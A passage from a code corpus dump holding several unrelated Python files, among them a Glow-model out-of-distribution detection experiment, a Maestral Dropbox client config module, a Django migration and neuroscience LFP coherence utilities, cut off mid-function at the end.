\"ContentTime\", \"EncapsulatedDocument\"]])\n \n # EncapsulatedDocument may contain different binary \n # representation of the same Bruker data set: process \n # separately\n baseline_bruker = get_encapsulated_document(baseline_filename)\n test_bruker = get_encapsulated_document(test_filename)\n if any(x is not None for x in [baseline_bruker, test_bruker]):\n differences = jsondiff.get_differences(baseline_bruker, test_bruker)\n for difference in differences:\n path = [str(x) for x in difference[0]]\n reason = difference[1]\n details = difference[2:]\n print(\n \"{} {}: {}, {}\".format(\n # Display common suffix: reverse of common prefix\n os.path.commonprefix(\n [baseline_filename[::-1], test_filename[::-1]]\n )[::-1],\n \"/\".join(path), \n reason, \" \".join(str(x) for x in details)))\n \n # Walk the test to find files missing in baseline (the difference between \n # files has already been tested).\n for pathname, dirnames, filenames in os.walk(test):\n relative_pathname = pathname[len(os.path.join(test, \"\")):]\n baseline_pathname = os.path.join(baseline, relative_pathname)\n for filename in filenames:\n if not os.path.isfile(os.path.join(baseline_pathname, filename)):\n print(\"{} missing in baseline\".format(\n os.path.join(relative_pathname, filename)))\n\ndef get_encapsulated_document(path):\n with odil.open(path, \"rb\") as fd:\n data_set = odil.Reader.read_file(fd)[1]\n if \"EncapsulatedDocument\" in data_set:\n data = data_set.as_binary(\"EncapsulatedDocument\")[0].get_memory_view().tobytes()\n return json.loads(data.decode())\n else:\n return None\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"scripts/diff_bruker2dicom.py","file_name":"diff_bruker2dicom.py","file_ext":"py","file_size_in_byte":4995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"401210220","text":"# author Artem Egorov\nimport math as m\n\nnumber_of_input_points = float(input())\nmy_dict = {}\nfor i in range(26):\n letter, letter_distance = input().split()\n my_dict[letter] = float(letter_distance)\nlent = 0\nphrase_paragraph = input().replace(\" \", \"\").upper()\nonly_alpha = \"\"\nfor char in phrase_paragraph:\n if 65 <= ord(char) <= 90:\n only_alpha += char\ntemp_arr = my_dict[only_alpha[0]]\nfor i in only_alpha[1:]:\n x = my_dict[i]\n x = float(x)\n difference = 2 * number_of_input_points * abs(m.sin(m.radians((x - temp_arr) / 2)))\n temp_arr = x\n lent = lent + difference\nprint(m.ceil(lent + number_of_input_points))\n","sub_path":"Aeneas' cryptographic disc/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"357245598","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport competition.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('competition', '0013_tournament_display_margin_per_game'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='tournament',\n name='year',\n field=models.IntegerField(default=competition.models.current_year, choices=[(2016, 2016), (2017, 2017), (2018, 2018), (2019, 2019), (2020, 2020)]),\n ),\n ]\n","sub_path":"competition/migrations/0014_auto_20180302_1316.py","file_name":"0014_auto_20180302_1316.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"51304766","text":"# -*- coding: utf-8 -*-\nimport mltk\nfrom mltk.data import ArraysDataStream, DataStream\nfrom tensorkit import tensor as T\nimport sys\nfrom argparse import ArgumentParser\n\nfrom pprint import pformat\n\nfrom matplotlib import pyplot\nimport torch\n\nimport tfsnippet as spt\nfrom tfsnippet.examples.utils import (MLResults,\n print_with_title)\nimport numpy as np\n\nfrom flow_next.common import TrainConfig, DataSetConfig, make_dataset, train_model, get_mapper\nfrom flow_next.models.glow import GlowConfig, Glow\nfrom ood_regularizer.experiment.datasets.overall import load_overall, load_complexity\nfrom ood_regularizer.experiment.models.utils import get_mixed_array\nfrom ood_regularizer.experiment.utils import plot_fig, make_diagram_torch, get_ele_torch\n\nfrom utils.data import SplitInfo\nfrom utils.evaluation import dequantized_bpd\nimport torch.autograd as autograd\nfrom imgaug import augmenters as iaa\n\n\nclass ExperimentConfig(mltk.Config):\n # model parameters\n z_dim = 256\n act_norm = False\n weight_norm = False\n batch_norm = False\n l2_reg = 0.0002\n kernel_size = 3\n shortcut_kernel_size = 1\n nf_layers = 20\n\n # training parameters\n result_dir = None\n write_summary = True\n max_epoch = 400\n warm_up_start = 200\n initial_beta = -3.0\n uniform_scale = False\n use_transductive = True\n mixed_train = False\n mixed_train_epoch = 64\n mixed_train_skip = 64\n mixed_times = 64\n mixed_replace = 64\n mixed_replace_ratio = 1.0\n dynamic_epochs = False\n retrain_for_batch = True\n pretrain = True\n stand_weight = 0.1\n\n compressor = 2 # 0 for jpeg, 1 for png, 2 for flif\n\n max_step = None\n batch_size = 64\n smallest_step = 5e-5\n initial_lr = 0.0005\n lr_anneal_factor = 0.5\n lr_anneal_epoch_freq = []\n lr_anneal_step_freq = None\n clip_norm = 5\n\n n_critical = 5\n # evaluation parameters\n train_n_qz = 1\n test_n_qz = 10\n test_batch_size = 64\n test_epoch_freq = 200\n plot_epoch_freq = 20\n distill_ratio = 1.0\n distill_epoch = 5000\n\n epsilon = -20.0\n min_logstd_of_q = -3.0\n\n sample_n_z = 100\n\n x_shape = (32, 32, 3)\n x_shape_multiple = 3072\n extra_stride = 2\n\n train = TrainConfig(\n optimizer='adamax',\n init_batch_size=128,\n batch_size=64,\n test_batch_size=64,\n test_epoch_freq=10,\n max_epoch=50,\n # grad_global_clip_norm=None,\n grad_global_clip_norm=1.0,\n debug=True\n )\n model = GlowConfig(\n hidden_conv_activation='relu',\n hidden_conv_channels=[128, 128],\n depth=3,\n levels=3,\n )\n in_dataset = 'cifar10'\n out_dataset = 'svhn'\n count_experiment = False\n\n\ndef main():\n with mltk.Experiment(ExperimentConfig, args=sys.argv[1:]) as exp, \\\n T.use_device(T.first_gpu_device()):\n while True:\n try:\n exp.make_dirs('plotting')\n break\n except Exception:\n pass\n config = exp.config\n # prepare for training and testing data\n config.in_dataset = DataSetConfig(name=config.in_dataset)\n config.out_dataset = DataSetConfig(name=config.out_dataset)\n x_train_complexity, x_test_complexity = load_complexity(config.in_dataset.name, config.compressor)\n svhn_train_complexity, svhn_test_complexity = load_complexity(config.out_dataset.name, config.compressor)\n\n if config.count_experiment:\n with open('/home/cwx17/research/ml-workspace/projects/wasserstein-ood-regularizer/count_experiments',\n 'a') as f:\n f.write(exp.abspath(\"\") + '\\n')\n f.close()\n\n experiment_dict = {\n 'celeba': '/mnt/mfs/mlstorage-experiments/cwx17/b0/e5/02c52d867e43f4e461f5',\n 'svhn': '/mnt/mfs/mlstorage-experiments/cwx17/f9/d5/02812baa4f70f4e461f5',\n 'cifar100': '/mnt/mfs/mlstorage-experiments/cwx17/6c/d5/02732c28dc8df4e461f5',\n 'tinyimagenet': '/mnt/mfs/mlstorage-experiments/cwx17/02/e5/02279d802d3af4e461f5',\n 'cifar10': '/mnt/mfs/mlstorage-experiments/cwx17/e9/d5/02812baa4f70f4e461f5',\n 'noise': '/mnt/mfs/mlstorage-experiments/cwx17/db/d5/02812baa4f70f19e02f5',\n 'constant': '/mnt/mfs/mlstorage-experiments/cwx17/25/e5/02c52d867e43435322f5',\n 'mnist28': '/mnt/mfs/mlstorage-experiments/cwx17/80/e5/02c52d867e43f4e461f5',\n 'omniglot28': '/mnt/mfs/mlstorage-experiments/cwx17/a0/e5/02c52d867e43f4e461f5',\n 'not_mnist28': '/mnt/mfs/mlstorage-experiments/cwx17/90/e5/02c52d867e43f4e461f5',\n 'kmnist28': '/mnt/mfs/mlstorage-experiments/cwx17/12/e5/02279d802d3af4e461f5',\n 'fashion_mnist28': '/mnt/mfs/mlstorage-experiments/cwx17/7c/d5/02732c28dc8df4e461f5',\n 'noise28': '/mnt/mfs/mlstorage-experiments/cwx17/d5/e5/02732c28dc8d622303f5',\n 'constant28': '/mnt/mfs/mlstorage-experiments/cwx17/c5/e5/02732c28dc8d622303f5'\n }\n print(experiment_dict)\n if config.in_dataset.name in experiment_dict:\n restore_checkpoint = experiment_dict[config.in_dataset.name]\n else:\n restore_checkpoint = None\n print('restore model from {}'.format(restore_checkpoint))\n\n # load the dataset\n cifar_train_dataset, cifar_test_dataset, cifar_dataset = make_dataset(config.in_dataset)\n print('CIFAR DataSet loaded.')\n svhn_train_dataset, svhn_test_dataset, svhn_dataset = make_dataset(config.out_dataset)\n print('SVHN DataSet loaded.')\n\n cifar_train_flow = cifar_test_dataset.get_stream('train', 'x', config.batch_size)\n cifar_test_flow = cifar_test_dataset.get_stream('test', 'x', config.batch_size)\n svhn_train_flow = svhn_test_dataset.get_stream('train', 'x', config.batch_size)\n svhn_test_flow = svhn_test_dataset.get_stream('test', 'x', config.batch_size)\n\n if restore_checkpoint is not None:\n model = torch.load(restore_checkpoint + '/model.pkl')\n else:\n # construct the model\n model = Glow(cifar_train_dataset.slots['x'], exp.config.model)\n print('Model constructed.')\n\n # train the model\n train_model(exp, model, cifar_train_dataset, cifar_test_dataset)\n\n torch.save(model, 'model.pkl')\n\n with mltk.TestLoop() as loop:\n @torch.no_grad()\n def eval_ll(x):\n x = T.from_numpy(x)\n ll, outputs = model(x)\n bpd = -dequantized_bpd(ll, cifar_train_dataset.slots['x'])\n return T.to_numpy(bpd)\n\n x_test = cifar_dataset.get_array('test', 'x')\n svhn_test = svhn_dataset.get_array('test', 'x')\n if x_test.shape[-1] == 3:\n config.stand_weight = 0.2\n print(x_test.shape)\n mixed_array = np.concatenate([\n x_test, svhn_test\n ])\n index = np.arange(0, len(mixed_array))\n np.random.shuffle(index)\n index = index[:len(index) // config.mixed_times]\n config.mixed_train_skip = config.mixed_train_skip // config.mixed_times\n config.mixed_train_epoch = config.mixed_train_epoch * config.mixed_times\n index = index[:300]\n mixed_array = mixed_array[index]\n mixed_kl = []\n\n test_mapper = get_mapper(config.in_dataset, training=False)\n train_mapper = get_mapper(config.in_dataset, training=True)\n test_mapper.fit(cifar_dataset.slots['x'])\n train_mapper.fit(cifar_dataset.slots['x'])\n mixed_stream = ArraysDataStream(\n [mixed_array], batch_size=config.batch_size, shuffle=False,\n skip_incomplete=False).map(\n lambda x: test_mapper.transform(x))\n\n mixed_ll = get_ele_torch(eval_ll, mixed_stream)\n\n def stand(base, another_arrays=None):\n mean, std = np.mean(base), np.std(base)\n return_arrays = []\n for array in another_arrays:\n return_arrays.append(-np.abs((array - mean) / std) * config.stand_weight)\n return return_arrays\n\n cifar_train_nll = get_ele_torch(eval_ll, cifar_train_flow)\n [mixed_stand] = stand(cifar_train_nll, [mixed_ll])\n\n if not config.pretrain:\n model = Glow(cifar_train_dataset.slots['x'], exp.config.model)\n torch.save(model, 'last.pkl')\n\n for i in range(0, len(mixed_array), config.mixed_train_skip):\n def data_generator():\n mixed_index = np.random.randint(i if config.retrain_for_batch else 0,\n min(len(mixed_array), i + config.mixed_train_skip),\n config.batch_size)\n\n batch_x = mixed_array[mixed_index]\n aug = iaa.Affine(\n translate_percent={'x': (-0.1, 0.1), 'y': (-0.1, 0.1)},\n # order=3, # turn on this if not just translation\n rotate=(-60, 60),\n mode='edge',\n backend='cv2'\n )\n batch_x = aug(images=batch_x)\n batch_x = train_mapper.transform(batch_x)\n ll = mixed_ll[mixed_index]\n # print(batch_x.shape)\n\n if config.distill_ratio != 1.0:\n ll_omega = eval_ll(batch_x)\n batch_index = np.argsort(ll - ll_omega)\n batch_index = batch_index[:int(len(batch_index) * config.distill_ratio)]\n batch_x = batch_x[batch_index]\n yield [T.from_numpy(batch_x)]\n\n if config.dynamic_epochs:\n repeat_epoch = int(\n config.mixed_train_epoch * len(mixed_array) / (9 * i + len(mixed_array)))\n repeat_epoch = max(1, repeat_epoch)\n else:\n repeat_epoch = config.mixed_train_epoch\n repeat_epoch = repeat_epoch * config.mixed_train_skip // config.batch_size\n # data generator generate data for each batch\n # repeat_epoch will determine how much time it generates\n exp.config.train.lr = 0.001 / 16\n exp.config.train.warmup_epochs = None\n exp.config.train.max_epoch = repeat_epoch\n exp.config.train.test_epoch_freq = exp.config.train.max_epoch + 1\n if config.retrain_for_batch:\n model = torch.load('last.pkl')\n try:\n train_model(exp, model, svhn_train_dataset, None,\n DataStream.generator(data_generator))\n except Exception as e:\n print(e)\n\n mixed_kl.append(get_ele_torch(eval_ll, ArraysDataStream(\n [mixed_array[i: i + config.mixed_train_skip]], batch_size=config.batch_size, shuffle=False,\n skip_incomplete=False).map(lambda x: test_mapper.transform(x))))\n loop.add_metrics(increment_process=len(mixed_kl) / len(mixed_array))\n print(mixed_kl[i] - mixed_ll[i], index[i] < len(x_test))\n\n mixed_kl = np.concatenate(mixed_kl)\n mixed_kl = mixed_kl - mixed_ll\n cifar_kl = mixed_kl[index < len(x_test)]\n svhn_kl = mixed_kl[index >= len(x_test)]\n loop.add_metrics(kl_histogram=plot_fig([-cifar_kl, -svhn_kl],\n ['red', 'green'],\n [config.in_dataset.name + ' Test',\n config.out_dataset.name + ' Test'],\n 'log(bit/dims)',\n 'kl_histogram'))\n mixed_kl = mixed_kl - mixed_stand\n cifar_kl = mixed_kl[index < len(x_test)]\n svhn_kl = mixed_kl[index >= len(x_test)]\n loop.add_metrics(kl_with_stand_histogram=plot_fig([-cifar_kl, -svhn_kl],\n ['red', 'green'],\n [config.in_dataset.name + ' Test',\n config.out_dataset.name + ' Test'], 'log(bit/dims)',\n 'kl_with_stand_histogram'))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ood_regularizer/experiment/models/singleshot/glow.py","file_name":"glow.py","file_ext":"py","file_size_in_byte":12731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"476319114","text":"# -*- coding: utf-8 -*-\n#\n# Copyright © Spyder Project Contributors\n# Licensed under the terms of the MIT License\n# (see spyder/__init__.py for details)\n\n\"\"\"\nMaestral configuration options\n\nNote: The 'account' section is used for internal purposes only to store some\nbasic information on the user account between connections. The 'internal'\nsection saves cursors and time-stamps for the last synced Dropbox state and\nlocal state, respectively. Resetting those to the default values will trigger\na full download on the next startup.\n\"\"\"\n\nimport os\nimport copy\nfrom .user import UserConfig\nfrom .base import get_conf_path\n\n\nPACKAGE_NAME = os.getenv('MAESTRAL_CONFIG', 'maestral')\nSUBFOLDER = 'maestral'\n\n\n# =============================================================================\n# Defaults\n# =============================================================================\n\nDEFAULTS = [\n ('main', # main settings regarding folder locations etc\n {\n 'path': '', # dropbox folder location (parent folder)\n 'default_dir_name': 'Dropbox ({})', # default dropbox folder name\n 'excluded_folders': [], # files excluded from sync, currently not supported\n 'excluded_files': [], # folders excluded from sync, currently not supported\n }\n ),\n ('account', # info on linked Dropbox account, periodically updated from servers\n {\n 'account_id': '',\n 'email': '',\n 'display_name': '',\n 'abbreviated_name': '',\n 'type': '',\n 'usage': '',\n 'usage_type': '',\n }\n ),\n ('app', # app settings\n {\n 'notifications': True, # enable / disable system tray notifications\n 'log_level': 20, # log level for file log, defaults to INFO\n 'update_notification_last': 0.0, # last notification about updates\n 'update_notification_interval': 60*60*24*7, # interval to check for updates (sec)\n 'latest_release': '0.0.0', # latest available release\n 'analytics': False, # automatically report crashes and errors with bugsnag\n }\n ),\n ('internal', # saved sync state\n {\n 'cursor': '', # remote cursor: represents last state synced from Dropbox\n 'lastsync': 0.0, # local cursor: time-stamp of last upload\n 'recent_changes': [], # cached list of recent changes to display in GUI\n }\n ),\n]\n\n\n# =============================================================================\n# Config instance\n# =============================================================================\n# IMPORTANT NOTES:\n# 1. If you want to *change* the default value of a current option, you need to\n# do a MINOR update in config version, e.g. from 3.0.0 to 3.1.0\n# 2. If you want to *remove* options that are no longer needed in our codebase,\n# or if you want to *rename* options, then you need to do a MAJOR update in\n# version, e.g. from 3.0.0 to 4.0.0\n# 3. You don't need to touch this value if you're just adding a new option\nCONF_VERSION = '9.1.0'\n\n\nclass MaestralConfig(object):\n \"\"\"Singleton config instance for Maestral\"\"\"\n\n _instances = {}\n\n def __new__(cls, *args, **kwargs):\n \"\"\"\n Create new instance for a new config name, otherwise return existing instance.\n \"\"\"\n name = args[0]\n\n if name in cls._instances:\n return cls._instances[args[0]]\n else:\n defaults = copy.deepcopy(DEFAULTS)\n # set default dir name according to config\n for sec, options in defaults:\n if sec == 'main':\n options['default_dir_name'] = f'Dropbox ({name.title()})'\n\n path = get_conf_path('maestral', create=True)\n try:\n conf = UserConfig(\n path, name, defaults=defaults, version=CONF_VERSION, load=True,\n backup=True, raw_mode=True, remove_obsolete=True\n )\n except OSError:\n conf = UserConfig(\n path, name, defaults=defaults, version=CONF_VERSION, load=False,\n backup=True, raw_mode=True, remove_obsolete=True\n )\n\n conf._name = name\n\n cls._instances[args[0]] = conf\n return conf\n","sub_path":"maestral/config/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"250419715","text":"import os\nimport sys\nfrom copy import deepcopy\n\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom soundsig.signal import coherency\nfrom soundsig.spikes import compute_psth\nfrom soundsig.timefreq import power_spectrum_jn\nfrom zeebeez3.transforms.biosound import BiosoundTransform\nfrom zeebeez3.transforms.pairwise_cf import PairwiseCFTransform\nfrom zeebeez3.transforms.stim_event import StimEventTransform\nfrom zeebeez3.core.utils import USED_ACOUSTIC_PROPS, ROSTRAL_CAUDAL_ELECTRODES_LEFT, ROSTRAL_CAUDAL_ELECTRODES_RIGHT\n\nCOLOR_BLUE_LFP = '#0068A5'\nCOLOR_YELLOW_SPIKE = '#F0DB00'\nCOLOR_RED_SPIKE_RATE = '#E90027'\nCOLOR_PURPLE_LFP_CROSS = '#863198'\nCOLOR_CRIMSON_SPIKE_SYNC = '#610B0B'\n\n\ndef set_font(size=16):\n font = {'family': 'normal', 'weight': 'bold', 'size': size}\n matplotlib.rc('font', **font)\n matplotlib.rc('axes', labelsize=24)\n matplotlib.rc('axes', titleweight='bold')\n\n\ndef get_this_dir():\n \"\"\" Get the directory that contains the python file that is calling this function. \"\"\"\n\n f = sys._current_frames().values()[0]\n calling_file_path = f.f_back.f_globals['__file__']\n root_dir, fname = os.path.split(calling_file_path)\n return root_dir\n\n\ndef get_freqs(sample_rate, window_length=0.060, increment=None):\n if increment is None:\n increment = 2.0 / sample_rate\n nt = int(window_length * 2 * sample_rate)\n s = np.random.randn(nt)\n pfreq, psd1, ps_var, phase = power_spectrum_jn(s, sample_rate, window_length, increment)\n return pfreq\n\n\ndef get_lags_ms(sample_rate, lags=np.arange(-20, 21, 1)):\n return (lags / sample_rate) * 1e3\n\n\ndef log_transform(s):\n nz = s > 0\n s[nz] = 20 * np.log10(s[nz]) + 70\n s[s < 0] = 0\n\n\ndef compute_spectra_and_coherence_single_electrode(lfp1, lfp2, sample_rate, e1, e2,\n window_length=0.060, increment=None, log=True,\n window_fraction=0.60, noise_floor_db=25,\n lags=np.arange(-20, 21, 1), psd_stats=None):\n \"\"\"\n\n :param lfp1: An array of shape (ntrials, nt)\n :param lfp2: An array of shape (ntrials, nt)\n :return:\n \"\"\"\n\n # compute the mean (locked) spectra\n lfp1_mean = lfp1.mean(axis=0)\n lfp2_mean = lfp2.mean(axis=0)\n\n if increment is None:\n increment = 2.0 / sample_rate\n\n pfreq, psd1, ps_var, phase = power_spectrum_jn(lfp1_mean, sample_rate, window_length, increment)\n pfreq, psd2, ps_var, phase = power_spectrum_jn(lfp2_mean, sample_rate, window_length, increment)\n\n if log:\n log_transform(psd1)\n log_transform(psd2)\n\n c12 = coherency(lfp1_mean, lfp2_mean, lags, window_fraction=window_fraction, noise_floor_db=noise_floor_db)\n\n # compute the nonlocked spectra coherence\n c12_pertrial = list()\n ntrials, nt = lfp1.shape\n psd1_ms_all = list()\n psd2_ms_all = list()\n for k in range(ntrials):\n i = np.ones([ntrials], dtype='bool')\n i[k] = False\n lfp1_jn_mean = lfp1[i, :].mean(axis=0)\n lfp2_jn_mean = lfp2[i, :].mean(axis=0)\n\n lfp1_ms = lfp1[k, :] - lfp1_jn_mean\n lfp2_ms = lfp2[k, :] - lfp2_jn_mean\n\n pfreq, psd1_ms, ps_var_ms, phase_ms = power_spectrum_jn(lfp1_ms, sample_rate, window_length, increment)\n pfreq, psd2_ms, ps_var_ms, phase_ms = power_spectrum_jn(lfp2_ms, sample_rate, window_length, increment)\n if log:\n log_transform(psd1_ms)\n log_transform(psd2_ms)\n\n psd1_ms_all.append(psd1_ms)\n psd2_ms_all.append(psd2_ms)\n\n c12_ms = coherency(lfp1_ms, lfp2_ms, lags, window_fraction=window_fraction, noise_floor_db=noise_floor_db)\n c12_pertrial.append(c12_ms)\n\n psd1_ms_all = np.array(psd1_ms_all)\n psd2_ms_all = np.array(psd2_ms_all)\n psd1_ms = psd1_ms_all.mean(axis=0)\n psd2_ms = psd2_ms_all.mean(axis=0)\n\n if psd_stats is not None:\n psd_mean1, psd_std1 = psd_stats[e1]\n psd_mean2, psd_std2 = psd_stats[e2]\n psd1 -= psd_mean1\n psd1 /= psd_std1\n psd2 -= psd_mean2\n psd2 /= psd_std2\n\n psd1_ms -= psd_mean1\n psd1_ms /= psd_std1\n psd2_ms -= psd_mean2\n psd2_ms /= psd_std2\n\n c12_pertrial = np.array(c12_pertrial)\n c12_nonlocked = c12_pertrial.mean(axis=0)\n\n # compute the coherence per trial then take the average\n c12_totals = list()\n for k in range(ntrials):\n c12 = coherency(lfp1[k, :], lfp2[k, :], lags, window_fraction=window_fraction, noise_floor_db=noise_floor_db)\n c12_totals.append(c12)\n\n c12_totals = np.array(c12_totals)\n c12_total = c12_totals.mean(axis=0)\n\n return pfreq, psd1, psd2, psd1_ms, psd2_ms, c12, c12_nonlocked, c12_total\n\n\ndef compute_spectra_and_coherence_multi_electrode_single_trial(lfps, sample_rate, electrode_indices, electrode_order,\n window_length=0.060, increment=None, log=True,\n window_fraction=0.60, noise_floor_db=25,\n lags=np.arange(-20, 21, 1),\n psd_stats=None):\n \"\"\"\n :param lfps: an array of shape (ntrials, nelectrodes, nt)\n :return:\n \"\"\"\n\n if increment is None:\n increment = 2.0 / sample_rate\n\n nelectrodes, nt = lfps.shape\n freqs = get_freqs(sample_rate, window_length, increment)\n lags_ms = get_lags_ms(sample_rate, lags)\n\n spectra = np.zeros([nelectrodes, len(freqs)])\n cross_mat = np.zeros([nelectrodes, nelectrodes, len(lags_ms)])\n\n for k in range(nelectrodes):\n\n _e1 = electrode_indices[k]\n i1 = electrode_order.index(_e1)\n\n lfp1 = lfps[k, :]\n\n freqs, psd1, ps_var, phase = power_spectrum_jn(lfp1, sample_rate, window_length, increment)\n if log:\n log_transform(psd1)\n\n if psd_stats is not None:\n psd_mean, psd_std = psd_stats[_e1]\n\n \"\"\"\n plt.figure()\n plt.subplot(2, 2, 1)\n plt.plot(freqs, psd1, 'k-')\n plt.title('PSD (%d)' % _e1)\n plt.axis('tight')\n\n plt.subplot(2, 2, 3)\n plt.plot(freqs, psd_mean, 'g-')\n plt.title('Mean')\n plt.axis('tight')\n\n plt.subplot(2, 2, 4)\n plt.plot(freqs, psd_std, 'c-')\n plt.title('STD')\n plt.axis('tight')\n\n plt.subplot(2, 2, 2)\n psd1_z = deepcopy(psd1)\n psd1_z -= psd_mean\n psd1_z /= psd_std\n plt.plot(freqs, psd1_z, 'r-')\n plt.title('Zscored')\n plt.axis('tight')\n \"\"\"\n psd1 -= psd_mean\n psd1 /= psd_std\n\n spectra[i1, :] = psd1\n\n for j in range(k):\n _e2 = electrode_indices[j]\n i2 = electrode_order.index(_e2)\n\n lfp2 = lfps[j, :]\n\n cf = coherency(lfp1, lfp2, lags, window_fraction=window_fraction, noise_floor_db=noise_floor_db)\n\n \"\"\"\n freqs,c12,c_var_amp,c_phase,c_phase_var,coherency,coherency_t = coherence_jn(lfp1, lfp2, sample_rate,\n window_length, increment,\n return_coherency=True)\n \"\"\"\n\n cross_mat[i1, i2] = cf\n cross_mat[i2, i1] = cf[::-1]\n\n return spectra, cross_mat\n\n\ndef add_region_info(agg, df):\n \"\"\" Make a new DataFrame that contains region information. \"\"\"\n\n edf = pd.read_csv('/auto/tdrive/mschachter/data/aggregate/electrode_data.csv')\n\n new_data = dict()\n for key in df.keys():\n new_data[key] = list()\n\n # peek into the aggregate data to get a list of class names\n k1 = agg.class_names.keys()[0]\n stim_class_names = agg.class_names[k1][0]\n\n new_data['reg1'] = list()\n new_data['reg2'] = list()\n new_data['gs'] = list() # global selectivity\n\n for cname in stim_class_names:\n new_data['pcc_%s' % cname] = list()\n new_data['sel_%s' % cname] = list()\n\n # make a map of bird/block/hemi/electrode for fast lookup\n emap = dict()\n for k, row in edf.iterrows():\n key = (row['bird'], row['block'], row['hemisphere'], row['electrode'])\n reg = row['region']\n emap[key] = reg\n\n for k, row in df.iterrows():\n for key in df.keys():\n if key == 'segment' and row[key] == 'Call1c':\n new_data[key].append('Call1')\n else:\n new_data[key].append(row[key])\n\n bird = row['bird']\n block = row['block']\n hemi = row['hemi']\n e1 = row['e1']\n e2 = row['e2']\n\n # get the confusion matrix for this row\n index = row['index']\n mat_key = (row['decomp'], row['order'], row['ptype'])\n C = agg.confidence_matrices[mat_key][index]\n cnames = agg.class_names[mat_key][index]\n\n # compute the pcc fraction for each category\n pcc_fracs = np.zeros([len(cnames)])\n for k, cname in enumerate(cnames):\n p = C[k]\n p /= p.sum()\n pcc_fracs[k] = p[k]\n new_data['pcc_%s' % cname].append(p[k])\n\n # compute the selectivity for each category\n for k, cname in enumerate(cnames):\n i = np.ones(len(cnames), dtype='bool')\n i[k] = False\n sel = np.log2(((len(cnames) - 1) * pcc_fracs[k]) / pcc_fracs[i].sum())\n new_data['sel_%s' % cname].append(sel)\n\n # normalize the fractions so they become a distribution\n pcc_fracs /= pcc_fracs.sum()\n\n # compute the global selectivity\n if np.isnan(pcc_fracs).sum() > 0:\n gs = 0\n else:\n nz = pcc_fracs > 0\n assert np.abs(pcc_fracs.sum() - 1) < 1e-6, \"pcc_fracs.sum()=%f\" % pcc_fracs.sum()\n Hobs = -np.sum(pcc_fracs[nz] * np.log2(pcc_fracs[nz]))\n Hmax = np.log2(len(cnames))\n gs = 1. - (Hobs / Hmax)\n new_data['gs'].append(gs)\n\n key = (bird, block, hemi, e1)\n reg1 = emap[key]\n\n key = (bird, block, hemi, e2)\n reg2 = emap[key]\n\n reg1 = reg1.replace('L2b', 'L2')\n reg1 = reg1.replace('L2A', 'L2')\n reg1 = reg1.replace('L2B', 'L2')\n\n reg2 = reg2.replace('L2b', 'L2')\n reg2 = reg2.replace('L2A', 'L2')\n reg2 = reg2.replace('L2B', 'L2')\n\n new_data['reg1'].append(reg1)\n new_data['reg2'].append(reg2)\n\n return pd.DataFrame(new_data), stim_class_names\n\n\ndef get_psd_stats(bird, block, seg, hemi, data_dir='/auto/tdrive/mschachter/data'):\n transforms_dir = os.path.join(data_dir, bird, 'transforms')\n cf_file = os.path.join(transforms_dir, 'PairwiseCF_%s_%s_%s_%s_raw.h5' % (bird, block, seg, hemi))\n cft = PairwiseCFTransform.load(cf_file)\n\n electrodes = cft.df.electrode1.unique()\n\n estats = dict()\n for e in electrodes:\n i = (cft.df.electrode1 == e) & (cft.df.electrode1 == cft.df.electrode2) & (cft.df.decomp == 'locked')\n indices = cft.df['index'][i].values\n psds = cft.psds[indices]\n log_transform(psds)\n estats[e] = (psds.mean(axis=0), psds.std(axis=0, ddof=1))\n return estats\n\n\ndef compute_avg_and_ms(lfp):\n lfp_mean = lfp.mean(axis=0)\n\n lfp_ms_all = list()\n ntrials, nelectrodes = lfp.shape\n for k in range(ntrials):\n i = np.ones([ntrials], dtype='bool')\n i[k] = False\n lfp_resid = lfp[k, :] - lfp[i].mean(axis=0)\n lfp_ms_all.append(lfp_resid)\n\n lfp_ms_all = np.array(lfp_ms_all)\n lfp_ms = lfp_ms_all.mean(axis=0)\n\n return lfp_mean, lfp_ms\n\n\ndef get_e2e_dists(data_dir='/auto/tdrive/mschachter/data'):\n edata = pd.read_csv(os.path.join(data_dir, 'aggregate', 'electrode_data+dist.csv'))\n\n # precompute distance from each electrode to each other electrode\n e2e_dists = dict()\n for (bird, block, hemi), gdf in edata.groupby(['bird', 'block', 'hemisphere']):\n\n mult = 1.\n if bird == 'GreBlu9508M':\n mult = 4.\n\n num_electrodes = len(gdf.electrode.unique())\n assert num_electrodes == 16\n e2e = dict()\n for e1 in gdf.electrode.unique():\n i1 = (gdf.electrode == e1)\n assert i1.sum() == 1\n dl2a1 = gdf.dist_l2a[i1].values[0] * mult\n dmid1 = gdf.dist_midline[i1].values[0]\n\n for e2 in gdf.electrode.unique():\n i2 = (gdf.electrode == e2)\n assert i2.sum() == 1\n dl2a2 = gdf.dist_l2a[i2].values[0] * mult\n dmid2 = gdf.dist_midline[i2].values[0]\n\n e2e[(e1, e2)] = np.sqrt((dl2a1 - dl2a2) ** 2 + (dmid1 - dmid2) ** 2)\n e2e_dists[(bird, block, hemi)] = e2e\n\n return e2e_dists\n\n\ndef get_full_data(bird, block, segment, hemi, stim_id, data_dir='/auto/tdrive/mschachter/data'):\n bdir = os.path.join(data_dir, bird)\n tdir = os.path.join(bdir, 'transforms')\n\n aprops = USED_ACOUSTIC_PROPS\n\n # load the BioSound\n bs_file = os.path.join(tdir, 'BiosoundTransform_%s.h5' % bird)\n bs = BiosoundTransform.load(bs_file)\n\n # load the StimEvent transform\n se_file = os.path.join(tdir, 'StimEvent_%s_%s_%s_%s.h5' % (bird, block, segment, hemi))\n print\n 'Loading %s...' % se_file\n se = StimEventTransform.load(se_file, rep_types_to_load=['raw'])\n se.zscore('raw')\n se.segment_stims_from_biosound(bs_file)\n\n # load the pairwise 